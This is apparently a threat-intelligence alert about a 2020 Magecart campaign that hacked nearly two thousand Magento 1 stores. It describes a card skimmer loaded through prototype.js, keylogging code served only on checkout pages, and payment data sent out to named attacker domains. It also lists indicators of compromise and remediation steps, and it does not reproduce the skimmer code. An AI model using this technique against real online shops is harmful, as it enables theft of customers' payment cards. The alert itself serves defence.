Malware Analysis – AZORult Info Stealer
September 15, 2020Rewterz Threat Alert – IcedID banking Trojan – IOCs
September 16, 2020Malware Analysis – AZORult Info Stealer
September 15, 2020Rewterz Threat Alert – IcedID banking Trojan – IOCs
September 16, 2020Severity
High
Analysis Summary
Almost two thousand Magento 1 stores across the world have been hacked in the largest documented campaign to date. It was a typical Magecart attack with injected malicious code would intercept the payment information of unsuspected store customers. Inspected stores were found running Magento version 1, which was announced End-Of-Life last June.
For the affected Magento 1 stores, a skimmer loaded was added to the file prototype.js which is part of a standard Magento installation.
The //mcdnn.net/122002/assets/js/widget.js serves dynamic content, depending on what page it is being included on. Only when referenced from a checkout page, it will serve the malicious, keystroke logging code:
The actual payments are being exfiltrated to a Moscow-hosted site at https://imags.pw/502.jsp, on the same network as the mcdnn.net domain.
Impact
- Steal customer payment card information
- Exposure of sensitive data
Indicators of Compromise
Domain Name
- mcdnn[.]net
- imags[.]pw
- mcdnn[.]me
- myicons[.]net
URL
- http[:]//mcdnn[.]net/122002/assets/js/widget[.]js
- https[:]//imags[.]pw/502[.]jsp
Remediation
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.